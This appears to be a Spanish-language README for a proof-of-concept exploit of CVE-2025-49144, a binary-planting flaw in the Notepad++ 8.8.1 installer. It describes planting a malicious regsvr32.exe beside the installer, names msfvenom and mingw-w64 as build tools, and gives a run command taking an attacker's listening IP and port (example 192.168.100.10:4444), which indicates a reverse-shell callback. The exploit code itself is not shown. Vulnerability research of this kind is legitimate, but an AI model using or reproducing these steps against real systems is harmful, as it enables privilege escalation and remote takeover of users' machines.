
Prueba de Concepto (PoC) que explota la vulnerabilidad CVE-2025-49144 en el instalador de Notepad++ 8.8.1.
Este repositorio contiene un Prueba de Concepto (PoC) funcional que explota la vulnerabilidad CVE-2025-49144 en el instalador de Notepad++ 8.8.1. La ejecución maliciosa ocurre al colocar un binario (regsvr32.exe) en el mismo directorio que el instalador vulnerable. Cuando se ejecuta el instalador, hereda el contexto y activa el payload.
⚠️ Descargo de responsabilidad
Este código está destinado exclusivamente a fines educativos y de investigación. El uso no autorizado en sistemas sin permiso explícito puede constituir una violación de la ley.
El autor no es responsable por el mal uso o actividad maliciosa que involucre esta herramienta.
msfvenom (parte de Metasploit Framework)mingw-w64 (x86_64-w64-mingw32-gcc)npp.8.8.1.Installer.x64.exe (debe colocarse manualmente en el mismo directorio)python3 exploit.py -i <LHOST> -p <LPORT>
Ejemplo:
python3 exploit.py -i 192.168.100.10 -p 4444
Esto generará los siguientes archivos:
[
]